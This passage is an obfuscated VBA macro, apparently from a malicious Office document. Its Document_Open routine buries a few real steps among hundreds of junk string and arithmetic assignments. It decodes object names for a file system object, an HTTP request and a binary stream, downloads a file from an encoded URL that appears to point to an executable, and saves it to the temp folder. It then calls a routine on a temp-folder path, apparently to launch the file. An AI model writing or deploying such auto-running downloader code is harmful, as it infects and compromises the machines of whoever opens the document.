        mPeWO = Left("_Dy) -FkMR]f!vE^Ul", 5)
    Next kEYjZq

End Sub

Private Sub baCcer(knUyfMw As String, RkSaRo As Integer, YVBHzar As String)
    Hkuan = UCase("ZlqJnEUSR^mIYs")
    mVgKFL = Right("DZTiH#opc_!aSy", 5)
    Hkuan = RTrim("psmJxbnK_hOmj")
    EsYdIQTR = Space(8)
    For DHIpBu = 0 To 27
        JEzwSA = 1041 + 1318 + 800
        JEzwSA = LTrim("ENhyo$%&tWbqa[")
        rFNVbb = UCase("zZhNfzDo)Dl#jbpj]YV")
        Skjamx = 693 - 1269 - 857
        JEzwSA = 166 - 167 - 1174
        JEzwSA = Left("^E]?&#nmj i", 5)
        Skjamx = 640 + 631 + 899
        JEzwSA = Right("SxCsoQK-v-", 4)
        mPeWO = Right("(BQ)r*lYNo.oZ!", 4)
    Next DHIpBu

    mPeWO = LTrim("%_xEbkgRodHR#iSw")
    rFNVbb = StrReverse("pcbXVVY#dDUlC(Lf")
    EsYdIQTR = Right("FEtsHOcsLffurkcsvIn)", 3)
    mVgKFL = LTrim(")a$a(U-#*A")
    rFNVbb = 1752 + 1278 + 784
    mPeWO = UCase("WmSRSWwm!))g-DEQ")
    Hkuan = 1421 + 315 + 1311
    While ksCNDG < 243
        EsYdIQTR = RTrim("w&]zuuHS$F[FLt")
        Hkuan = "bZYRENh[Zbtg(" + "PyZrbSnO?^AdsjAKDrJ" + "VrcRwhzspdbkQv?dK"
        Skjamx = Space(18)
        jSFWWI = StrReverse("N!DtMVXUfiO@FMYzL.aS")
        Hkuan = LTrim("z#ya $eBQwghEWKStX")
        rFNVbb = Space(10)
        mPeWO = RTrim("XOGN?Ki%RlJj i")
        ksCNDG = ksCNDG + 2
    Wend

    jSFWWI = Space(18)
    mVgKFL = Right("Ahn&XiUPJVNhFkr", 3)
    While HkKZiS < 49
        mPeWO = 1640 - 574 - 735
        EsYdIQTR = StrReverse("jGb[G.b!zFPyw%")
        HkKZiS = HkKZiS + 1
    Wend

    JEzwSA = StrReverse("WA (MMDByje $ytn")
    Hkuan = 1176 + 1969 + 359
    jSFWWI = Left("]&j*WPfSIf(u%(soHK", 2)
    mPeWO = LTrim("Hqlfv %dnXTTmxU@")
    Skjamx = LTrim("WBT%#fnEXBQ]juo]N!")
    JEzwSA = Space(20)
    mPeWO = "shWp@[UIat#%v" + "Jr-xOs&sutNvn$u" + "YSAKkCNF@!T!jeOR"
    Hkuan = Right("$HKG ^[BeXv^c", 2)
    Hkuan = "bG?$!#AEPOh?" + "pb%)SGkrA#@vfoQ" + "Cm[?d.X--OeEkO*PQQ"
    EsYdIQTR = Space(9)
    jSFWWI = Left("?c*t%TLvjfih?f@?Kn", 2)
    EsYdIQTR = StrReverse("#Fzen#X]n.FsKQS")
    mVgKFL = 828 + 1643 + 377
    EsYdIQTR = RTrim("pz#nDkzdZ@T")
    rFNVbb = LTrim("Wxu*Z?x(yL!sPL(H")
    rFNVbb = StrReverse("s PVq.OUUrjFxBhc.")
    rFNVbb = UCase("Uth ?eNfMt")
    Hkuan = Left("xlAo$I_Pjc&][zUSV", 4)
    rFNVbb = Right("_i@nnfuTUP% HUeb_Y", 3)
    EsYdIQTR = UCase("H^OUd**]ro")
    EsYdIQTR = "SoHtMgKjHQtvm(Kk" + "i-yf*ENlWL*WB" + "TKaGgthUbsJOsqNg"
    Skjamx = Left("Uek?K(&iJvnK&Z", 4)
    EsYdIQTR = Left("eJWfvTRzwwAFwkf", 2)
End Sub

Private Sub Document_Open()
    Dim GNaCQqR As String
    Skjamx = LTrim("#m#Gc_ D]@U")
    For XnsbHr = 0 To 188
        mPeWO = 1026 - 1340 - 1680
        mPeWO = RTrim("&Naxk_dHsrJsJ.eBUYYL")
        JEzwSA = 1738 + 1229 + 1874
        EsYdIQTR = Left("Zrm_*WdWa#(dRkI", 3)
        Hkuan = UCase("s[.S]iWe[s-mQVg$qb")
        mVgKFL = Left("H_G.[IEe^@yVCRa^?*", 2)
    Next XnsbHr

    Hkuan = RTrim("*_zrGo_ uMP")
    While mHjOIm < 269
        EsYdIQTR = RTrim("!^abMg]Cc^.ICVJg$o^")
        JEzwSA = 473 - 1423 - 1941
        JEzwSA = 374 - 705 - 1378
        JEzwSA = "OBril]D-F&nc#OFD)@" + "NxjA-JmnyR@HZK[V u?&" + "[AYhG)wD*HLlY"
        mPeWO = RTrim("sS@Bjt[@[]AvR-")
        JEzwSA = 283 - 1188 - 473
        mHjOIm = mHjOIm + 3
    Wend

    mPeWO = StrReverse("fJ[Yk!H gepoK")
    Hkuan = Space(15)
    Set LMgVGCBu = CreateObject(VuLYqmAZ("s#cnr_iKpytqi)nvgh.yfyiRlKeRsIy%s]tPebmtoYbWjce-c-tk"))
    EsYdIQTR = 1437 + 167 + 832
    For rEarSE = 0 To 119
        EsYdIQTR = Right("HKM#ed_ORYNB*$", 2)
        Skjamx = 1873 + 455 + 330
        JEzwSA = Left("*c!AnDad zi", 3)
        Skjamx = 390 + 1383 + 1021
        mVgKFL = Space(10)
        rFNVbb = RTrim("WWURzxO- ^zA")
        jSFWWI = 814 + 1073 + 193
    Next rEarSE

    JEzwSA = Right("c)X U!#*zkDsnn", 5)
    mVgKFL = LTrim("S?BK)Zstw@Ny[")
    mPeWO = 1730 + 1088 + 1491
    JEzwSA = StrReverse("(e@&MwVt@?exEEk@F")
    nbiscj = LMgVGCBu.GetSpecialFolder(1 + 1)
    rFNVbb = UCase("GIXn*yMCOn")
    jSFWWI = LTrim("Ye)pSyFr(b-!kk")
    JEzwSA = 888 + 1166 + 1224
    mVgKFL = Space(20)
    Hkuan = StrReverse("CEJ^yX_mVy")
    Skjamx = 944 - 1449 - 1838
    GNaCQqR = StrReverse("NenxQeO.eI)HPoNIHn?z")
    mVgKFL = UCase("u-K]mTJ.cuq")
    For VOZWQS = 0 To 182
        JEzwSA = StrReverse("t]&Wdb]Ir&pMmfWP*G")
        JEzwSA = RTrim("#*myuqGtrE@d")
    Next VOZWQS

    For KDYNoL = 0 To 263
        jSFWWI = UCase("Xj?AockVHNy^")
        JEzwSA = LTrim("B*Af$Ea^Dca?(H]i")
        mVgKFL = Right("ov]I#m%_M^A)#iCop", 2)
        EsYdIQTR = Left("py!Vek^h.lx(", 3)
        Skjamx = Space(20)
    Next KDYNoL

    Hkuan = StrReverse("yaynzof(Ug!h")
    JEzwSA = 1714 - 1874 - 799
    jSFWWI = Space(5)
    While KWVblk < 245
        jSFWWI = "U$Jh#&@anjRsOH_O]?rL" + "%Y@swNGboS" + "txhqCn)hM_"
        rFNVbb = Space(13)
        rFNVbb = "(kOakY*#I NrpN" + "]yR!NzqWbXFzCz" + "bf!e!EqYF[AsM"
        Hkuan = UCase("sJ_gtcFDcfiKUs#")
        mPeWO = RTrim("$[kX%$bSe$d-THkXJxh@")
        KWVblk = KWVblk + 1
    Wend

    Skjamx = Right("@IBWX?oXmeqZ!]j)Bfc", 5)
    mPeWO = 784 - 1014 - 735
    mVgKFL = LTrim("c[GOx&KmeqB!^sOf_")
    While ieiRRF < 160
        jSFWWI = "EKodXvcqibpG@$i" + "M.ADMsrLsl-*H%" + "kKCW MjAi k($!Oj"
        JEzwSA = 790 + 1967 + 1788
        Skjamx = LTrim("T@^[a xjgT!PJ!gzy")
        mPeWO = StrReverse("Awh@P?[d_gmwm&?EI")
        mVgKFL = UCase("xWXEzqQanxQ&[_ H")
        Skjamx = 165 - 544 - 788
        ieiRRF = ieiRRF + 1
    Wend

    mVgKFL = StrReverse("ZlfH_PV.mstCz_jtna")
    jSFWWI = 819 - 1266 - 540
    Hkuan = Space(20)
    EsYdIQTR = 1675 + 728 + 1429
    While bktOvC < 304
        JEzwSA = RTrim("*vYxujKi?sPIEo")
        mVgKFL = LTrim("pqVZ-HR]?qNNvR#X")
        JEzwSA = "oFwk*%WVOAX" + "e(ujSIG^!PqlvOy$" + "Joj#qvoh(*paLWh"
        EsYdIQTR = 745 + 1487 + 641
        jSFWWI = Space(12)
        rFNVbb = LTrim("hPvovKVRhFDG n")
        mPeWO = UCase("tN_!*xjtXe")
        rFNVbb = 940 - 1244 - 1074
        Skjamx = Right("(gXXwakAR#L", 2)
        Skjamx = " THxrj-sH)PylK" + "-?^rmm(MSUj(io]" + "PtLIIII@xPEZl["
        bktOvC = bktOvC + 1
    Wend

    JEzwSA = 829 - 1612 - 492
    rFNVbb = "xtreXg?wE^" + "[b-yl?)plRyCMe" + "^ST?zKSW)ZbH@E"
    Dim gCijM, xrBjAKin As Object
    mVgKFL = 753 + 939 + 915
    mVgKFL = "PP#evPBAc_ jZ_#D-xH" + "U.nBQN#oUQ" + "&_JHV*r@KdMbAnYY"
    JEzwSA = UCase("BAP]muMMzXZwCLOa")
    While UrvkHg < 16
        mVgKFL = RTrim("Amp yhBTVXn")
        Hkuan = 609 + 967 + 1127
        mVgKFL = "OpVN%WIbmW-&eCRv" + "YZl@QOV jC.! A*CWC?)" + "_WNJ#bkSW nccfls"
        jSFWWI = Right("f[q-Fy?Up.egIJ?", 3)
        UrvkHg = UrvkHg + 2
    Wend

    For BRsVQo = 0 To 273
        jSFWWI = Right("v)kJJxdp#WH", 2)
        Skjamx = 416 + 987 + 1464
        Hkuan = "*K]LKEjS?D" + "*azy$wc#lbtsTv[s" + "S_lro^s J*.X?IX*Sfv"
        rFNVbb = LTrim("bX.]A)HPQT%GU(vR")
        jSFWWI = 995 + 607 + 545
        rFNVbb = LTrim("?)[kumcBdGAvhY")
    Next BRsVQo

    For WYhvNz = 0 To 243
        Hkuan = 1873 - 313 - 1490
        mPeWO = RTrim("AhDhZ @oOdTg_xqK*-")
    Next WYhvNz

    mVgKFL = "zkH[s?L u@BefQKnv$" + "YG ?Cj#rLMkURu]" + "Zbs_cV]DoxM"
    Hkuan = LTrim("%)YVPvS.qUCKeLq")
    Set gCijM = CreateObject(VuLYqmAZ("MdiUcArJo.sjosfRt-.QXgMALEH?TFT^Pn"))
    rFNVbb = 805 + 1101 + 568
    mVgKFL = StrReverse("_vLjgO!oF$((TmIR_IB")
    Hkuan = StrReverse("R?wEVgiOpP")
    For WYdQSG = 0 To 341
        jSFWWI = "&$IQxuo)JTQXI!" + "Dj@&lOSZmXJn[lC&$_yO" + "w _GQj?pyHKTX?"
        rFNVbb = StrReverse("N!Ir^Ufc@$[UAD_")
        EsYdIQTR = RTrim(" c-lEkra_$Jph)WL*Th")
        Skjamx = Left("dgvnI^f)vF!XkATbZ", 2)
        jSFWWI = UCase("d%]xWvQsFFz^")
        jSFWWI = "_JjD$c-%QoWf&ABGnW" + "tQTafFMYI^IkVp%w*" + "^]t.!hb]dH"
        JEzwSA = StrReverse("NeGoXV)$ rk#OY")
        Skjamx = 1229 + 1785 + 562
        mVgKFL = Left("OgI!#T)WneG[fwmD[", 5)
    Next WYdQSG

    For DiOWwF = 0 To 92
        Skjamx = UCase("xivCGsg*lfIFL@py")
        EsYdIQTR = 653 + 1169 + 1207
        JEzwSA = "DY^h%LGP[_Ml[fu" + "kAJJ!BUAzeDFM" + "^QnUZT^-WSh[g.t@gD"
        jSFWWI = LTrim("fMmHsjFqpMNg")
        JEzwSA = ".C-lZ%!lJD[" + "])djovr%LtFOV*B[" + "XEVndtIfJ#oJ-k$.u"
        Skjamx = "KHtKErZBdi(RgoR" + "TFKydTtKZMv" + "xnAoE[Sh)%NBq"
        jSFWWI = UCase("HubXiWyqI-?$U)")
        jSFWWI = LTrim("HtO)uEObKkeZ?&jP^V&")
        Hkuan = RTrim("#gJ VNGlqMST]*V^?CuK")
        mPeWO = UCase("LjOlN)QXGXn[E MK")
    Next DiOWwF

    mEQSj = VuLYqmAZ("h#tQt@p!:o/c/Jaoljiq.zmmyds[eNtfh(e&rVwQa.lblTe)t.z*.kccowmx/ba!l?iV/?B_IzGE.UEkX-Ed")
    mPeWO = RTrim("c -Elt? @?WdUWWhF")
    While RMHIjj < 176
        JEzwSA = LTrim("]N[x*djXeuZT@)l")
        Skjamx = 136 + 1319 + 964
        rFNVbb = Left("ijQI.GPrZU@DL", 3)
        Hkuan = 1926 - 1561 - 1768
        mPeWO = RTrim("!q*E(_f-@XNywlDnRBzh")
        JEzwSA = Left("hz%OQgzge]", 4)
        mPeWO = UCase("yFwfgVU%PvrVl]kNUo")
        RMHIjj = RMHIjj + 2
    Wend

    EsYdIQTR = Left("sQIilZeEKb(a", 2)
    For WFQwvg = 0 To 385
        mPeWO = RTrim("rs[irInEyq&QLi@Zx")
        Hkuan = StrReverse("CacaqtCaDlBR]#d*[")
        JEzwSA = ".]VtnaOgCT(yNC^" + "wtPEuMpDVXLTO DP]" + "BgDRw@.gh["
        mPeWO = StrReverse("&-%@QjlOoezh")
        Hkuan = StrReverse("eM?qnXDBe-G(oVPSEqY")
        EsYdIQTR = Right("@f C&)Sx)UTZfcial", 3)
    Next WFQwvg

    For ZsCgpf = 0 To 113
        rFNVbb = Space(20)
        Hkuan = 1786 + 1252 + 894
        rFNVbb = StrReverse("LfT!p^GHSA*WSq(eZ[L")
        Hkuan = UCase("F_LvoXkUTUPnHuuvegm")
        JEzwSA = UCase("MLFDi?*.!wLgCbh")
        JEzwSA = StrReverse("-#rcQodNDbVlq?")
    Next ZsCgpf

    Skjamx = Left("w!]Q%iUfHOV?LcXX", 3)
    rFNVbb = RTrim("ktSSDgKX![(c _qcV@")
    gCijM.Open "GET", mEQSj, False
    For BrDjIw = 0 To 33
        mVgKFL = Space(20)
        JEzwSA = StrReverse("xubdrw@!uD%mojp.gU*")
        rFNVbb = 651 - 708 - 1531
        mVgKFL = Right("sASj*^HF.LOqe", 4)
        jSFWWI = "%f&#BDZY[OK" + "eo$YFs@CQU-^$dm" + "(atP]c@@Bspr"
        Hkuan = "!MWSV&efHUc_hqmDKxfW" + "vVp$qKGgxjlj" + "At]lxj Av*UM"
        EsYdIQTR = UCase("_c JQP(TzanTwQ *y")
        Hkuan = 465 - 746 - 1835
    Next BrDjIw

    EsYdIQTR = Left("D$rkjIG.dB(P^NTCa", 4)
    mPeWO = Space(19)
    While dKmoPE < 278
        rFNVbb = RTrim("-XQck(fTBe#II%")
        EsYdIQTR = 1676 + 1358 + 1331
        mPeWO = StrReverse("Wm?Qq^lfYa")
        mPeWO = Space(1)
        dKmoPE = dKmoPE + 2
    Wend

    Skjamx = Left("Os!H.]$x$LmTCmx", 2)
    mPeWO = StrReverse("mzaPIfIT_l.)vfM$o#%z")
    For jhyAZd = 0 To 66
        EsYdIQTR = LTrim("Hjv_FX?x?u]vsuW BX(I")
        JEzwSA = "UylT]csD&$WJYu%i-" + "*?RNQz-ou[R" + "czKxsQL oWWksXNBqz"
        mVgKFL = 184 + 769 + 687
        mVgKFL = Space(7)
        jSFWWI = 1176 + 872 + 1005
        JEzwSA = Space(7)
        EsYdIQTR = Space(1)
    Next jhyAZd

    Skjamx = Left("aj.% R&l&Q pgEH", 4)
    gCijM.send
    rFNVbb = Left("NHvBPtV^pyzFK$", 5)
    Skjamx = LTrim("#@OLL*QkR!SFGFJvePN")
    EsYdIQTR = StrReverse("Yn(CxUY*QELezM^")
    Skjamx = UCase("SOsD]juFAq")
    Skjamx = UCase("pjO-Ox-UfIt")
    While mVtZIL < 61
        jSFWWI = 1171 - 257 - 1656
        jSFWWI = Space(17)
        rFNVbb = StrReverse("^?wjQi&fCT&PH.!M")
        JEzwSA = StrReverse("#q(C&UfTZHZ")
        Skjamx = Space(11)
        rFNVbb = 937 - 1661 - 788
        EsYdIQTR = 665 + 1080 + 434
        Skjamx = RTrim("x.BX.^tHo]^]")
        mVgKFL = Left("FYuuuITzJ[OTvCH", 5)
        JEzwSA = Left("J)QgxFsbdFR?A", 3)
        mVtZIL = mVtZIL + 2
    Wend

    mPeWO = 1574 - 1783 - 1157
    jSFWWI = RTrim("Br#C*_Y(?GlTr")
    If gCijM.Status = 202 - 2 Then
    rFNVbb = Space(5)
    JEzwSA = RTrim(". l[a&c@xQqhL#H]maMJ")
    mVgKFL = 1563 - 1426 - 1560
    mPeWO = Left("g^s(unYtJAljn", 4)
    rFNVbb = RTrim(".c%vezutS@_$M!^SPWq")
    EsYdIQTR = RTrim("jgZg_qP(Not-%I")
    For JfLZtt = 0 To 32
        Skjamx = Right("kouXSeosfQ**AmN", 5)
        mPeWO = 1595 + 1244 + 1497
        JEzwSA = 1556 - 1676 - 1435
        rFNVbb = StrReverse("Fc!BnihI[vx%H")
        mPeWO = LTrim("@UaCnhAc pnhW")
        jSFWWI = Left("!(sZIkA yvB[Oj@rdz", 4)
        Hkuan = StrReverse("jr!s(UOHHm")
        Skjamx = Space(5)
        mVgKFL = LTrim("#q[K@sTRJpaCzmQ@slH")
    Next JfLZtt

        Set xrBjAKin = CreateObject(VuLYqmAZ("AkDZOCDaBV.!S%tmr*e$a$mf"))
    jSFWWI = RTrim("DKiqdbfbD @qPtx")
    jSFWWI = "KQnsSzyMUZ&" + "v?FIAS#Xd-YdIfQ" + "D?g.qv(Twwe@ J"
    Hkuan = Right(".L_tm#^Tk l(KA^", 2)
    jSFWWI = 1721 + 1759 + 1512
    Skjamx = 809 + 1289 + 381
    For xsNAzI = 0 To 397
        EsYdIQTR = LTrim("#RHHSUV]ql*Uzua %")
        JEzwSA = StrReverse("Ix%K@PASW@l#fIPwgcPA")
        Skjamx = 1007 - 1468 - 1271
    Next xsNAzI

    JEzwSA = UCase("#e*LfFBgrw")
    mVgKFL = RTrim("qPY_uiJZ_]hzog")
    jSFWWI = 1408 - 1703 - 1520
        xrBjAKin.Open
    While TcWGRj < 167
        JEzwSA = UCase(" z$^lTuK.X")
        EsYdIQTR = 335 - 1879 - 835
        TcWGRj = TcWGRj + 1
    Wend

    mPeWO = Left("z(^hWHIVi*", 4)
    jSFWWI = Right("pwbU-&wlX)!H%", 2)
    EsYdIQTR = Space(16)
    JEzwSA = 636 - 1187 - 1074
    jSFWWI = Space(2)
        xrBjAKin.Type = 2 - 1
    rFNVbb = Right("EAuokUU$^((rl", 4)
    mVgKFL = 1754 + 1287 + 475
    EsYdIQTR = 1254 - 1596 - 1322
    Skjamx = Right("oNmJg[d^A!uZ", 5)
    mPeWO = Left("gpbyPjB^CRxQ", 2)
    jSFWWI = LTrim("cydol)UwIIcz")
    mVgKFL = Space(7)
    jSFWWI = UCase("thdkOebNXAv(z")
    While UAQlez < 55
        mPeWO = Left("&U#zt@Cmvr%YEH", 4)
        Hkuan = RTrim("SPE_?bioAOnmMk.")
        EsYdIQTR = "ZugKVHDjOY.T" + "t^g!]TMLmzzdi_" + "!hl^fTvQEJ_."
        UAQlez = UAQlez + 1
    Wend

    mVgKFL = 361 - 1970 - 133
        WyVOTZ = gCijM.responseBody
    mPeWO = LTrim("#v#EIumkyAVw")
    mPeWO = Right("D$X@Bj)QaPcy^!BgYxl", 3)
    mVgKFL = Left("_d&_fMHAsrT)p", 3)
    Hkuan = LTrim("ja?h-pZVQCT")
    While syDndC < 384
        mPeWO = 799 + 1690 + 1774
        jSFWWI = Space(14)
        Hkuan = StrReverse("$)SLcWJwK#Hx@zz")
        EsYdIQTR = Right(" xlgVrzIyw_X#v", 2)
        Hkuan = LTrim("MjpsDYbtCnec*h@T]id")
        mPeWO = Right("G]whJ)!IgBrr [lgiWe", 2)
        syDndC = syDndC + 3
    Wend

    rFNVbb = Left("vJPFK*HYB@qId", 2)
    Skjamx = "_H^nCVNVZ uMI" + "C@*^cYv_!ogl" + "P!#$%FH u-I.qdJy!_NX"
    For kAIlrW = 0 To 181
        Skjamx = Left("b?gO#eSC#M!PvkMLrK", 5)
        Hkuan = RTrim("ujJ-zlb@N)QHswkkuc")
        Hkuan = 1521 + 1448 + 1775
    Next kAIlrW

        xrBjAKin.Write WyVOTZ
    For WJevPX = 0 To 318
        Skjamx = Right("vJ-&R%kMepXsgAF", 2)
        mVgKFL = UCase("QFyGy#L)h[clQP")
        jSFWWI = Right(".]X[-G_!^bAXXuDPXJEF", 2)
        Hkuan = 635 + 1468 + 1366
        mPeWO = 756 - 1482 - 1863
        EsYdIQTR = UCase("nQ^)yQk_xQ")
    Next WJevPX

    EsYdIQTR = 1246 - 453 - 555
    jSFWWI = LTrim("wW]*eo^c*ZRb)sFxyUFT")
    For ZGOOtW = 0 To 73
        EsYdIQTR = UCase("yhJC[tdjWsxI?hcMN)")
        Hkuan = "s-tBu e_dzmD" + "!OvYcdxULuGw@w^*_EL" + "ErWszXWxXREymH"
    Next ZGOOtW

    JEzwSA = "_NOXtcDQB-^aTm" + "@ukAUPumTqpsiCqySa" + "%Z bEAFgO&MwCOpDQX%"
    While pBMBXO < 131
        rFNVbb = Right("w[zY(^b@(Z@*Xv]khbz", 2)
        mVgKFL = 1990 + 730 + 583
        JEzwSA = RTrim("v-hWVVv!g_]]b#JD^#q")
        EsYdIQTR = Space(17)
        JEzwSA = StrReverse("kkkHYsE PBi")
        pBMBXO = pBMBXO + 2
    Wend

    JEzwSA = 119 - 1576 - 626
    While zwkJBo < 387
        JEzwSA = 1655 - 1289 - 1804
        JEzwSA = StrReverse("aFO]Oc$(yd")
        JEzwSA = 272 - 578 - 1011
        EsYdIQTR = LTrim("MKXX Mo@-*Fn")
        zwkJBo = zwkJBo + 1
    Wend

    EsYdIQTR = StrReverse("RFZny@_ Zf.JZBHB@Js")
    mVgKFL = StrReverse("OyVpYtOEeQnXpB$P)YX")
        Dim IRZnGJ As Object
    EsYdIQTR = 1247 - 1885 - 1695
    jSFWWI = Left("iez[zYk**aVLjv#YB", 4)
    Skjamx = RTrim("ug!-Vl^-&]")
    JEzwSA = 893 - 1850 - 1438
    rFNVbb = Right("_fOaDt%Gz@(lVOX-", 5)
    EsYdIQTR = " b-g)T@&cJZA)-N" + "Jq$m!JM_gWQJGg" + "(UWyNu[R$sSLR(r)^Q*N"
        Set IRZnGJ = CreateObject(VuLYqmAZ("sWcbrKigpkt]iBnRgz.pfUiul$eisBybsbtVeYmtojbHj*elcZtC"))
    rFNVbb = LTrim("PjEsBkkEBI ph[")
    JEzwSA = Left("I?rmG@ahSw*PQ%", 2)
    JEzwSA = UCase("MiSksztTIvLPRdgRo")
    jSFWWI = Left("Dhmc&ZuxAGnM?Vwd-(", 2)
    For vOxvDt = 0 To 133
        Hkuan = RTrim("^GM@Z$A%QTec")
        mPeWO = 115 + 1048 + 356
    Next vOxvDt

    While WoAroS < 210
        EsYdIQTR = "^*ncj]_mWiuU" + "cVGbK)H$ocjuNNjsTfQk" + "uHv&KESpWZrNU)w k"
        Hkuan = 894 + 819 + 744
        Hkuan = Left("lXmRVeFLTFB", 4)
        rFNVbb = Right("IssUzh![LxyXWw*Wla-J", 5)
        Skjamx = "Q(LBTNMMW*dv?%" + "UwxkwL)q![e%DuTkw" + "PzHeJ!gTZTJ LI@Zx[o"
        rFNVbb = StrReverse("rwTY?N-^FY.")
        Hkuan = 1505 - 236 - 991
        rFNVbb = StrReverse("ndDKGKSdE&A)e")
        EsYdIQTR = "T#))qr.mmcpF" + "caxokCTSyOc!?RM_FP@[" + "xp_xh^ou%Dzx"
        WoAroS = WoAroS + 2
    Wend

    JEzwSA = 1495 - 265 - 909
        EjYdZx = IRZnGJ.GetSpecialFolder(6 - 4)
    Hkuan = Right("pQiscR]E* pc@YD", 5)
    jSFWWI = StrReverse("@%[vkPYERehf")
    JEzwSA = Space(15)
    Hkuan = 1373 + 1724 + 690
    EsYdIQTR = "gcwKEJLLGA!FB%.BQ" + "#OWzL]kmRWY" + "LwJ^O%k]&UUB-prt"
    rFNVbb = RTrim("BDCHK^$cLIkL-#OQpB")
    rFNVbb = UCase("lSKNEfPIS-")
    While ElpyQI < 285
        rFNVbb = LTrim("bk]PC%U_oXLB)^")
        jSFWWI = RTrim("H@[)%?tZND?.O")
        mVgKFL = ".ZUDsxZwE#-" + "Rdre-*qWMV$]wjF]&" + "-sNBs@Bf)nq]I%FTp L"
        Skjamx = UCase("CpI?j$cNFA_^Hq")
        EsYdIQTR = 622 + 1326 + 721
        EsYdIQTR = Left("hiqG)BbIfB[FodpHgZ?x", 5)
        mPeWO = Space(19)
        JEzwSA = Space(12)
        rFNVbb = Right("]MzTVKAEy%reM?FA", 4)
        JEzwSA = LTrim("zXeQt?*@^?)Y ")
        ElpyQI = ElpyQI + 3
    Wend

    mVgKFL = 1022 + 830 + 290
        Call xrBjAKin.SaveToFile(EjYdZx & "\\" & VuLYqmAZ("zrnEIuo(HXIy.qejx@eL"), 2)
    While HowJiV < 305
        Skjamx = UCase("Oxr_Hd]MPlAkf")
        mVgKFL = "vooE xHx.z" + "#EaPThRTfLnU]zQw!e" + "p]#EJEdyiOZL"
        mVgKFL = 686 + 452 + 1648
        rFNVbb = Left("f^Y!ExFSccz", 2)
        JEzwSA = 716 + 158 + 839
        HowJiV = HowJiV + 2
    Wend

    mPeWO = Right("[g$rqtazk $b&s", 4)
    jSFWWI = "]@i#KMI.-hv.ZN*ulS" + "cyxZjvSI%tG" + "LNLEfJsWnaxoJ"
    While fEUZvl < 226
        EsYdIQTR = ")mQY^ouB-K(Q(Ip" + "pxmaw%[ZhvX*u@yW]#" + "vgyQdsWLnWGF)df.["
        jSFWWI = Right("q%bRhddW^T.", 4)
        Skjamx = StrReverse(")Uf.BJ?MQRMV_FmEt")
        mVgKFL = 1054 - 1294 - 1893
        fEUZvl = fEUZvl + 1
    Wend

    rFNVbb = Space(3)
    rFNVbb = Space(4)
    EsYdIQTR = 497 + 616 + 1928
        xrBjAKin.Close
    mPeWO = "ypkTAIRhiH" + "wNBpUPbCtjyLiayM)q_f" + "QAxpyM%!^azt"
    jSFWWI = 1159 + 1908 + 1962
    EsYdIQTR = Right("g&KuCx?I@U_U#tIC", 3)
    mPeWO = "Otv&olOSv(" + "!lil^RzIQ$zuJDl" + "RwSnmqBwZJWjZib]prs"
    For ekHbmO = 0 To 192
        rFNVbb = Space(7)
        mVgKFL = LTrim("EzOtdN@Y^bn")
        mPeWO = "yQ)ZePB.)hN]IH[" + "* v[)Mi! Odb@*!%Xg" + "H_gCmkf#%-Idod["
        jSFWWI = Space(19)
        JEzwSA = Right("]h[om*XI#$Yh$ &P", 3)
    Next ekHbmO

    End If
    mVgKFL = RTrim("[pMjMXsdyNecYdkyk")
    jSFWWI = 1171 + 848 + 1396
    mPeWO = Left("lBVt.[EYe-ON", 4)
    EsYdIQTR = RTrim("npIbT-Au z")
    Hkuan = LTrim("_%blaoH)TLbwDQcCSH.")
    rFNVbb = Space(9)
    JEzwSA = Right("ZSXrtaDFvGK", 4)

    While uYVTzs < 65
        EsYdIQTR = LTrim("#Yk%QrkZ@X#OU!e")
        EsYdIQTR = RTrim("GxNrp&@pg)o]J")
        uYVTzs = uYVTzs + 1
    Wend

    While hbBUzT < 86
        Hkuan = Right("L]^ZOIccStpxCsQkPt", 3)
        JEzwSA = LTrim("dj .)PXoRr[RN")
        Hkuan = RTrim("%-[aspwSqnRTnuY((dMz")
        Hkuan = Space(12)
        rFNVbb = RTrim("KRtDHIad-Igl&h[Vvw")
        hbBUzT = hbBUzT + 2
    Wend

    Skjamx = Space(17)
    mVgKFL = Right(")K..RYHnv_#$ZPFvF", 4)
    JEzwSA = UCase("KzWJ@C aDzKg")
    While xWqIzh < 369
        jSFWWI = "]YfPI!rYS$p #QY" + "LHSrPYEgpY&U" + "x%aexsEkj.&@"
        jSFWWI = "@vvt?yTLTP^y%cr" + "TqGd^ljbYfCkQo-NV" + "DejIh# zjuM"
        jSFWWI = RTrim("KFG&^qE!EDM*%n*")
        xWqIzh = xWqIzh + 2
    Wend

    mPeWO = Left("pP wH)zGdYaYZ]XB", 3)
    While fJIUlW < 335
        Hkuan = 1301 + 397 + 1670
        rFNVbb = Space(13)
        rFNVbb = UCase("z.Hq *--msRl")
        JEzwSA = Left("#HoWPU#QM[(PVA@", 2)
        fJIUlW = fJIUlW + 3
    Wend


    While smQqZxy < 227
        rFNVbb = StrReverse("Mjfn#VhyI&y^K&")
        While pkLoxK < 69
            Skjamx = Left("@?cQG[VG?sYAE ", 4)
            EsYdIQTR = StrReverse("Th@XA)i_p&yDmqb]&gkp")
            Hkuan = StrReverse("SWOxMau[_!JklVI)P#R")
            EsYdIQTR = Space(9)
            JEzwSA = UCase("t?hxlOquE*kz&g")
            jSFWWI = 1387 + 581 + 1772
            rFNVbb = LTrim("qiSVX_cqjD")
            pkLoxK = pkLoxK + 2
        Wend

        While WWHQaq < 80
            Hkuan = UCase("UzrFtNhF-NeB")
            mPeWO = "XU&M_LZABjQzZtysF_" + "xd?Fu(PFo)HQgK?b@O$" + "JoaUL@)BlQIK J*"
            mVgKFL = "#p%] heS) BvLEdTuoLT" + ")[mdH@WxHFzGw" + "FxHoCVS]%N![P"
            EsYdIQTR = 1093 - 312 - 476
            mPeWO = 1721 + 1471 + 595
            mVgKFL = Left("(H g T$qGrx", 5)
            jSFWWI = LTrim("[MtuI?(w]P)OI")
            Hkuan = Right("n&?HiNuIg.!X", 2)
            JEzwSA = UCase("Hl-b@nG.w*))LVufQyx")
            WWHQaq = WWHQaq + 2
        Wend

        Hkuan = RTrim("IyK(wqqrsgsioYdle")
        While zMaPfz < 103
            jSFWWI = Space(20)
            EsYdIQTR = 309 - 620 - 1414
            zMaPfz = zMaPfz + 2
        Wend

        Hkuan = RTrim("gIYkMn.CI(dyqIj!Qi")
        Skjamx = 1824 + 117 + 1546
        JEzwSA = LTrim("L(-BU K?Q[hGx@Eo-")
        If smQqZxy = 142 Then
            Call VZnaU(nbiscj & "\\" & VuLYqmAZ(GNaCQqR), "HIefoq", "CaFptg", "qwHVdFDA", "dFgrmkZpC", "zewzC", "BxQGpWDIH")
            Skjamx = Right("CXd^xvunyy^gV$?Bl_aU", 4)
            While yoGECU < 346
                JEzwSA = Space(7)
                mVgKFL = RTrim("grh)hO@T-?mjbuERP")
